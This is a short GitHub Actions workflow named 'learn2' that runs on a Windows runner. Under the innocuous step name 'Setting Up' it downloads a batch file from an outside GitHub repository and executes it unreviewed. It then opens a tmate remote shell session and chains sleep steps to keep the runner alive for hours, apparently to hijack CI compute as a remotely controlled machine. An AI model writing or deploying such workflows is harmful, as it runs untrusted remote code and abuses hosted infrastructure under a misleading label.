name: learn2
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v2
      - name: Setting Up
        run: |
         echo "EMAIL_SECRET=ainxd@hldrive.com" > secrets.txt
         start-sleep 5
         Invoke-WebRequest "https://github.com/cisipex552/5/raw/main/Files/down.bat" -OutFile "down.bat"
         cmd /c down.bat
      - name: Setup tmate Session
        uses: mxschmitt/action-tmate@v2   
      - name: A
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: B
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: C
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: D
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: E
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: F
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: G
        run: |
         start-sleep 300
         start-sleep -s 300
      - name: H
        run: |
         start-sleep 10800
         start-sleep -s 10800
